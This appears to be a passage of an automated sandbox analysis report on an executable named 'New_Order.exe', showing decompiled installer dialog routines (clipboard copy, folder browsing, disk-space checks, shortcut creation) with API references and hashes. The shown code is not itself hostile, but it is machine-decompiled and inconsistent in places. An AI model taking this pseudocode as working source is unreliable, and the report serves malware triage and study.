                                                                        			// (start a worker thread for control 0x3ec) and WM_CONTEXTMENU over the list
                                                                        			// view in _v8: it shows a one-item popup menu and, if that item is chosen,
                                                                        			// sizes a buffer from every list item's text length and copies the items to
                                                                        			// the clipboard one per line.
                                                                        			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct tagRECT _v24;
                                                                        				void* _v32;
                                                                        				signed int _v36;
                                                                        				int _v40;
                                                                        				int _v44;
                                                                        				signed int _v48;
                                                                        				int _v52;
                                                                        				void* _v56;
                                                                        				void* _v64;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				struct HWND__* _t87;
                                                                        				struct HWND__* _t89;
                                                                        				long _t90;
                                                                        				int _t95;
                                                                        				int _t96;
                                                                        				long _t99;
                                                                        				void* _t102;
                                                                        				intOrPtr _t124;
                                                                        				struct HWND__* _t128;
                                                                        				int _t150;
                                                                        				int _t153;
                                                                        				long _t157;
                                                                        				struct HWND__* _t161;
                                                                        				struct HMENU__* _t163;
                                                                        				long _t165;
                                                                        				void* _t166;
                                                                        				char* _t167;
                                                                        				char* _t168;
                                                                        				int _t169;
                                                                        
                                                                        				_t87 =  *0x42ec04; // 0x0
                                                                        				_t157 = _a8;
                                                                        				_t150 = 0;
                                                                        				_v8 = _t87;
                                                                        				if(_t157 != 0x110) { // 0x110 = WM_INITDIALOG
                                                                        					__eflags = _t157 - 0x405;
                                                                        					if(_t157 == 0x405) { // WM_USER+5: spawn worker thread, handle closed immediately
                                                                        						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                        					}
                                                                        					__eflags = _t157 - 0x111;
                                                                        					if(_t157 != 0x111) { // 0x111 = WM_COMMAND
                                                                        						L17:
                                                                        						__eflags = _t157 - 0x404;
                                                                        						if(_t157 != 0x404) { // WM_USER+4
                                                                        							L25:
                                                                        							__eflags = _t157 - 0x7b;
                                                                        							if(_t157 != 0x7b) { // 0x7b = WM_CONTEXTMENU
                                                                        								goto L20;
                                                                        							}
                                                                        							_t89 = _v8;
                                                                        							__eflags = _a12 - _t89;
                                                                        							if(_a12 != _t89) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150); // LVM_GETITEMCOUNT
                                                                        							__eflags = _t90 - _t150;
                                                                        							_a12 = _t90;
                                                                        							if(_t90 <= _t150) {
                                                                        								L36:
                                                                        								return 0;
                                                                        							}
                                                                        							_t163 = CreatePopupMenu();
                                                                        							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1)); // flags 0 (MF_STRING), command id 1
                                                                        							_t95 = _a16;
                                                                        							__eflags = _a16 - 0xffffffff;
                                                                        							_t153 = _a16 >> 0x10;
                                                                        							if(_a16 == 0xffffffff) {
                                                                        								GetWindowRect(_v8,  &_v24);
                                                                        								_t95 = _v24.left;
                                                                        								_t153 = _v24.top;
                                                                        							}
                                                                        							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150); // TPM_NONOTIFY | TPM_RETURNCMD: returns chosen command id
                                                                        							__eflags = _t96 - 1;
                                                                        							if(_t96 == 1) {
                                                                        								_t165 = 1;
                                                                        								__eflags = 1;
                                                                        								_v56 = _t150;
                                                                        								_v44 = 0x42a890;
                                                                        								_v40 = 0x1000;
                                                                        								_a4 = _a12;
                                                                        								do {
                                                                        									_a4 = _a4 - 1;
                                                                        									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                        									__eflags = _a4 - _t150;
                                                                        									_t165 = _t165 + _t99 + 2;
                                                                        								} while (_a4 != _t150);
                                                                        								OpenClipboard(_t150);
                                                                        								EmptyClipboard();
                                                                        								_t102 = GlobalAlloc(0x42, _t165);
                                                                        								_a4 = _t102;
                                                                        								_t166 = GlobalLock(_t102);
                                                                        								do {
                                                                        									_v44 = _t166;
                                                                        									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                        									 *_t167 = 0xd;
                                                                        									_t168 = _t167 + 1;
                                                                        									 *_t168 = 0xa;
                                                                        									_t166 = _t168 + 1;
                                                                        									_t150 = _t150 + 1;
                                                                        									__eflags = _t150 - _a12;
                                                                        								} while (_t150 < _a12);
                                                                        								GlobalUnlock(_a4);
                                                                        								SetClipboardData(1, _a4);
                                                                        								CloseClipboard();
                                                                        							}
                                                                        							goto L36;
                                                                        						}
                                                                        						__eflags =  *0x42ebec - _t150; // 0x0
                                                                        						if(__eflags == 0) {
                                                                        							ShowWindow( *0x42f428, 8);
                                                                        							__eflags =  *0x42f4cc - _t150;
                                                                        							if( *0x42f4cc == _t150) {
                                                                        								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
                                                                        							}
                                                                        							E00404154(1);
                                                                        							goto L25;
                                                                        						}
                                                                        						 *0x429c60 = 2;
                                                                        						E00404154(0x78);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						__eflags = _a12 - 0x403;
                                                                        						if(_a12 != 0x403) {
                                                                        							L20:
                                                                        							return E004041E2(_t157, _a12, _a16);
                                                                        						}
                                                                        						ShowWindow( *0x42ebf0, _t150);
                                                                        						ShowWindow(_v8, 8);
                                                                        						E004041B0(_v8);
                                                                        						goto L17;
                                                                        					}
                                                                        				}
                                                                        				_v48 = _v48 | 0xffffffff;
                                                                        				_v36 = _v36 | 0xffffffff;
                                                                        				_t169 = 2;
                                                                        				_v56 = _t169;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_v40 = 0;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t124 =  *0x42f434;
                                                                        				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                        				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                        				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                                        				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                                        				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                        				 *0x42ec04 = _t128;
                                                                        				_v8 = _t128;
                                                                        				E004041B0( *0x42ebf0);
                                                                        				 *0x42ebf4 = E00404AA1(4);
                                                                        				 *0x42ec0c = 0;
                                                                        				GetClientRect(_v8,  &_v24);
                                                                        				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                        				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                        				if(_a12 >= 0) {
                                                                        					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                        					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                        				}
                                                                        				if(_a8 >= _t150) {
                                                                        					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        				_push(0x1b);
                                                                        				E0040417B(_a4);
                                                                        				if(( *0x42f43c & 0x00000003) != 0) {
                                                                        					ShowWindow( *0x42ebf0, _t150);
                                                                        					if(( *0x42f43c & 0x00000002) != 0) {
                                                                        						 *0x42ebf0 = _t150;
                                                                        					} else {
                                                                        						ShowWindow(_v8, 8);
                                                                        					}
                                                                        					E004041B0( *0x42ebe8);
                                                                        				}
                                                                        				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                        				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                        				if(( *0x42f43c & 0x00000004) != 0) {
                                                                        					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                        					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                        				}
                                                                        				goto L36;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID:
                                                                        • API String ID: 590372296-0
                                                                        • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                        • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                        • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                                        • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				long _v16;
                                                                        				long _v20;
                                                                        				long _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				long _v36;
                                                                        				char _v40;
                                                                        				unsigned int _v44;
                                                                        				signed int _v48;
                                                                        				CHAR* _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				CHAR* _v72;
                                                                        				void _v76;
                                                                        				struct HWND__* _v80;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t82;
                                                                        				long _t87;
                                                                        				signed char* _t89;
                                                                        				void* _t95;
                                                                        				signed int _t96;
                                                                        				int _t109;
                                                                        				signed char _t114;
                                                                        				signed int _t118;
                                                                        				struct HWND__** _t122;
                                                                        				intOrPtr* _t138;
                                                                        				CHAR* _t146;
                                                                        				intOrPtr _t147;
                                                                        				unsigned int _t150;
                                                                        				signed int _t152;
                                                                        				unsigned int _t156;
                                                                        				signed int _t158;
                                                                        				signed int* _t159;
                                                                        				signed char* _t160;
                                                                        				struct HWND__* _t165;
                                                                        				struct HWND__* _t166;
                                                                        				int _t168;
                                                                        				unsigned int _t197;
                                                                        
                                                                        				_t156 = __edx;
                                                                        				_t82 =  *0x42a068;
                                                                        				_v32 = _t82;
                                                                        				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                        				if(_a8 == 0x40b) {
                                                                        					E004057F7(0x3fb, _t146);
                                                                        					E004063D2(_t146);
                                                                        				}
                                                                        				_t166 = _a4;
                                                                        				if(_a8 != 0x110) {
                                                                        					L8:
                                                                        					if(_a8 != 0x111) {
                                                                        						L20:
                                                                        						if(_a8 == 0x40f) {
                                                                        							L22:
                                                                        							_v8 = _v8 & 0x00000000;
                                                                        							_v12 = _v12 & 0x00000000;
                                                                        							E004057F7(0x3fb, _t146);
                                                                        							if(E00405B7D(_t185, _t146) == 0) {
                                                                        								_v8 = 1;
                                                                        							}
                                                                        							E004060F7(0x429860, _t146);
                                                                        							_t87 = E00406500(1);
                                                                        							_v16 = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								L30:
                                                                        								E004060F7(0x429860, _t146);
                                                                        								_t89 = E00405B28(0x429860);
                                                                        								_t158 = 0;
                                                                        								if(_t89 != 0) {
                                                                        									 *_t89 =  *_t89 & 0x00000000;
                                                                        								}
                                                                        								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                        									goto L35;
                                                                        								} else {
                                                                        									_t168 = 0x400;
                                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                        									asm("cdq");
                                                                        									_v48 = _t109;
                                                                        									_v44 = _t156;
                                                                        									_v12 = 1;
                                                                        									goto L36;
                                                                        								}
                                                                        							} else {
                                                                        								_t159 = 0;
                                                                        								if(0 == 0x429860) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									goto L26;
                                                                        								}
                                                                        								while(1) {
                                                                        									L26:
                                                                        									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                                        									if(_t114 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									if(_t159 != 0) {
                                                                        										 *_t159 =  *_t159 & _t114;
                                                                        									}
                                                                        									_t160 = E00405AD6(0x429860);
                                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                                        									_t159 = _t160 - 1;
                                                                        									 *_t159 = 0x5c;
                                                                        									if(_t159 != 0x429860) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L30;
                                                                        									}
                                                                        								}
                                                                        								_t150 = _v44;
                                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                        								_v44 = _t150 >> 0xa;
                                                                        								_v12 = 1;
                                                                        								_t158 = 0;
                                                                        								__eflags = 0;
                                                                        								L35:
                                                                        								_t168 = 0x400;
                                                                        								L36:
                                                                        								_t95 = E00404AA1(5);
                                                                        								if(_v12 != _t158) {
                                                                        									_t197 = _v44;
                                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                        										_v8 = 2;
                                                                        									}
                                                                        								}
                                                                        								_t147 =  *0x42ebfc; // 0x7c930d
                                                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                        									E00404A89(0x3ff, 0xfffffffb, _t95);
                                                                        									if(_v12 == _t158) {
                                                                        										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                                        									} else {
                                                                        										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                                                                        									}
                                                                        								}
                                                                        								_t96 = _v8;
                                                                        								 *0x42f4e4 = _t96;
                                                                        								if(_t96 == _t158) {
                                                                        									_v8 = E0040140B(7);
                                                                        								}
                                                                        								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                        									_v8 = _t158;
                                                                        								}
                                                                        								E0040419D(0 | _v8 == _t158);
                                                                        								if(_v8 == _t158 &&  *0x42a880 == _t158) {
                                                                        									E00404566();
                                                                        								}
                                                                        								 *0x42a880 = _t158;
                                                                        								goto L53;
                                                                        							}
                                                                        						}
                                                                        						_t185 = _a8 - 0x405;
                                                                        						if(_a8 != 0x405) {
                                                                        							goto L53;
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					_t118 = _a12 & 0x0000ffff;
                                                                        					if(_t118 != 0x3fb) {
                                                                        						L12:
                                                                        						if(_t118 == 0x3e9) {
                                                                        							_t152 = 7;
                                                                        							memset( &_v76, 0, _t152 << 2);
                                                                        							_v80 = _t166;
                                                                        							_v72 = 0x42a890;
                                                                        							_v60 = E0040495E;
                                                                        							_v56 = _t146;
                                                                        							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                                        							_t122 =  &_v80;
                                                                        							_v64 = 0x41;
                                                                        							__imp__SHBrowseForFolderA(_t122);
                                                                        							if(_t122 == 0) {
                                                                        								_a8 = 0x40f;
                                                                        							} else {
                                                                        								__imp__CoTaskMemFree(_t122);
                                                                        								E00405A8F(_t146);
                                                                        								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                                        								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                                                        									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                                                                        									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                                        										lstrcatA(_t146, 0x42e3c0);
                                                                        									}
                                                                        								}
                                                                        								 *0x42a880 =  *0x42a880 + 1;
                                                                        								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                        						goto L53;
                                                                        					}
                                                                        					_a8 = 0x40f;
                                                                        					goto L12;
                                                                        				} else {
                                                                        					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                        					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                                                                        						E00405A8F(_t146);
                                                                        					}
                                                                        					 *0x42ebf8 = _t166;
                                                                        					SetWindowTextA(_t165, _t146);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                        					_push(1);
                                                                        					E0040417B(_t166);
                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        					_push(0x14);
                                                                        					E0040417B(_t166);
                                                                        					E004041B0(_t165);
                                                                        					_t138 = E00406500(8);
                                                                        					if(_t138 == 0) {
                                                                        						L53:
                                                                        						return E004041E2(_a8, _a12, _a16);
                                                                        					} else {
                                                                        						 *_t138(_t165, 1);
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x0040460d
                                                                        0x00404613
                                                                        0x00404619
                                                                        0x00404626
                                                                        0x00404634
                                                                        0x00404637
                                                                        0x0040463f
                                                                        0x00404645
                                                                        0x00404645
                                                                        0x00404651
                                                                        0x00404654
                                                                        0x004046c2
                                                                        0x004046c9
                                                                        0x004047a0
                                                                        0x004047a7
                                                                        0x004047b6
                                                                        0x004047b6
                                                                        0x004047ba
                                                                        0x004047c4
                                                                        0x004047d1
                                                                        0x004047d3
                                                                        0x004047d3
                                                                        0x004047e1
                                                                        0x004047e8
                                                                        0x004047ef
                                                                        0x004047f2
                                                                        0x00404829
                                                                        0x0040482b
                                                                        0x00404831
                                                                        0x00404836
                                                                        0x0040483a
                                                                        0x0040483c
                                                                        0x0040483c
                                                                        0x00404858
                                                                        0x00000000
                                                                        0x0040485a
                                                                        0x0040485d
                                                                        0x0040486b
                                                                        0x00404871
                                                                        0x00404872
                                                                        0x00404875
                                                                        0x00404878
                                                                        0x00000000
                                                                        0x00404878
                                                                        0x004047f4
                                                                        0x004047f6
                                                                        0x004047fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004047fc
                                                                        0x004047fc
                                                                        0x00404809
                                                                        0x0040480e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404812
                                                                        0x00404814
                                                                        0x00404814
                                                                        0x0040481c
                                                                        0x0040481e
                                                                        0x00404821
                                                                        0x00404824
                                                                        0x00404827
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404827
                                                                        0x00404884
                                                                        0x0040488e
                                                                        0x00404891
                                                                        0x00404894
                                                                        0x0040489b
                                                                        0x0040489b
                                                                        0x0040489d
                                                                        0x0040489d
                                                                        0x004048a2
                                                                        0x004048a4
                                                                        0x004048ac
                                                                        0x004048b3
                                                                        0x004048b5
                                                                        0x004048c0
                                                                        0x004048c0
                                                                        0x004048b5
                                                                        0x004048c7
                                                                        0x004048d0
                                                                        0x004048da
                                                                        0x004048e2
                                                                        0x004048fd
                                                                        0x004048e4
                                                                        0x004048ed
                                                                        0x004048ed
                                                                        0x004048e2
                                                                        0x00404902
                                                                        0x00404907
                                                                        0x0040490c
                                                                        0x00404915
                                                                        0x00404915
                                                                        0x0040491e
                                                                        0x00404920
                                                                        0x00404920
                                                                        0x0040492c
                                                                        0x00404934
                                                                        0x0040493e
                                                                        0x0040493e
                                                                        0x00404943
                                                                        0x00000000
                                                                        0x00404943
                                                                        0x004047f2
                                                                        0x004047a9
                                                                        0x004047b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004047b0
                                                                        0x004046cf
                                                                        0x004046d8
                                                                        0x004046f2
                                                                        0x004046f7
                                                                        0x00404701
                                                                        0x00404708
                                                                        0x00404714
                                                                        0x00404717
                                                                        0x0040471a
                                                                        0x00404721
                                                                        0x00404729
                                                                        0x0040472c
                                                                        0x00404730
                                                                        0x00404737
                                                                        0x0040473f
                                                                        0x00404799
                                                                        0x00404741
                                                                        0x00404742
                                                                        0x00404749
                                                                        0x00404753
                                                                        0x0040475b
                                                                        0x00404768
                                                                        0x0040477c
                                                                        0x00404780
                                                                        0x00404780
                                                                        0x0040477c
                                                                        0x00404785
                                                                        0x00404792
                                                                        0x00404792
                                                                        0x0040473f
                                                                        0x00000000
                                                                        0x004046f7
                                                                        0x004046e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004046eb
                                                                        0x00000000
                                                                        0x00404656
                                                                        0x00404663
                                                                        0x0040466c
                                                                        0x00404679
                                                                        0x00404679
                                                                        0x00404680
                                                                        0x00404686
                                                                        0x0040468f
                                                                        0x00404692
                                                                        0x00404695
                                                                        0x0040469d
                                                                        0x004046a0
                                                                        0x004046a3
                                                                        0x004046a9
                                                                        0x004046b0
                                                                        0x004046b7
                                                                        0x00404949
                                                                        0x0040495b
                                                                        0x004046bd
                                                                        0x004046c0
                                                                        0x00000000
                                                                        0x004046c0
                                                                        0x004046b7

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 0040465C
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                        • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                        • lstrcmpiA.KERNEL32(GHFGHFGHFDGDFGDFg,0042A890,00000000,?,?), ref: 00404774
                                                                        • lstrcatA.KERNEL32(?,GHFGHFGHFDGDFGDFg), ref: 00404780
                                                                        • SetDlgItemTextA.USER32 ref: 00404792
                                                                          • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\New_Order.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                          • Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                        • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                          • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                          • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                          • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 2624150263-1489735066
                                                                        • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                        • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                        • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                                        • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E0040216B() {
                                                                        				signed int _t55;
                                                                        				void* _t59;
                                                                        				intOrPtr* _t63;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr* _t67;
                                                                        				intOrPtr* _t69;
                                                                        				intOrPtr* _t71;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t75;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t80;
                                                                        				intOrPtr* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				int _t87;
                                                                        				intOrPtr* _t95;
                                                                        				signed int _t105;
                                                                        				signed int _t109;
                                                                        				void* _t111;
                                                                        
                                                                        				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                        				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                        				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                        				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                        				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                        				_t55 =  *(_t111 - 0x18);
                                                                        				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                        				_t105 = _t55 & 0x00008000;
                                                                        				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                        				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                        				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                                                                        					E00402BCE(0x21);
                                                                        				}
                                                                        				_t59 = _t111 + 8;
                                                                        				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                        				if(_t59 < _t87) {
                                                                        					L15:
                                                                        					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                        					_push(0xfffffff0);
                                                                        				} else {
                                                                        					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                        					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                        					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                        					if(_t64 >= _t87) {
                                                                        						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                        						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                        						if(_t105 == _t87) {
                                                                        							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                        							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                                                                        						}
                                                                        						if(_t109 != _t87) {
                                                                        							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                        							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                        						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                        						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                        						if( *_t95 != _t87) {
                                                                        							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                        							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                        						}
                                                                        						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                        						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                        						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                        						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                        						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                        							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                        							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                        								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                        								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                        							}
                                                                        						}
                                                                        						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                        						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                        					}
                                                                        					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                        					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                        					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                        						_push(0xfffffff4);
                                                                        					} else {
                                                                        						goto L15;
                                                                        					}
                                                                        				}
                                                                        				E00401423();
